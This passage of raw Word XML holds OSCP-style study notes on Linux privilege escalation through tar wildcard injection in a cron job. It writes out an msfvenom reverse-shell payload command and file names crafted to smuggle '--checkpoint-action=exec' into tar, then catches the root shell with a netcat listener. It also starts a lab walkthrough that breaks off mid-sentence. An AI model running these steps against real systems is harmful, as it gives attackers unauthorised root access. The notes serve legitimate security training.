          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following commands should show how this works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002535">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ls *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002536">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">% touch ./-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002537">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ls *</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filenames are not simply restricted to simple options like -h or --help.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In fact we can create filenames that match complex options: --option=key=value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins (https://gtfobins.github.io) can help determine whether a command has command line options which will be useful for our purposes</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the system-wide crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="142" name="image139.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image139.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId792"/>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2540">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the /usr/local/bin/compress.sh file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002541">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat /usr/local/bin/compress.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002542">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002543">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002544">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins shows that tar has command line options which can be used to run other commands as part of a checkpoint feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002546">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4329113" cy="950462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="104" name="image97.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image97.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId793"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4329113" cy="9504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547">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use msfvenom to create a reverse shell ELF payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002548">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=53 -f elf -o shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002549">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the directory where the cron job is running the tar command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the file to the /home/user directory on the remote host and make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create two files in the /home/user directory (or wherever your cron job is running tar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For OSCP-C .157, this didn't work for me, so I made /bin/bash have SUID instead to login as root. You can look at "Example1 of Bash Gobbling or Linux tar wildcard" for more details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002550">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint-action=exec=shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002551">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For files starting with "-" in its name, you need to add ./ at the start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a netcat listener on your local machine and wait for the cron job to run. A reverse shell running as the root user should be caught:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002553">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="293" name="image284.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image284.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79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2554">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002555">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002556">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ym8t2grxevp6" w:id="327"/>
      <w:bookmarkEnd w:id="327"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example1 of Bash Gobbling or Linux tar wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002557">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .157 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002558">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002559">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, for priv esc, we are supposed to run pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>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854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79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255B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see mentions of CRON and we see tar with the * symbol which makes us think of Bash Gobbling also known as Linux tar wildcard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I looked in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and found nothing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can further inspect cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /etc/cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002560">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I see a file called 2minutes and it has the tar command! We also saw "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
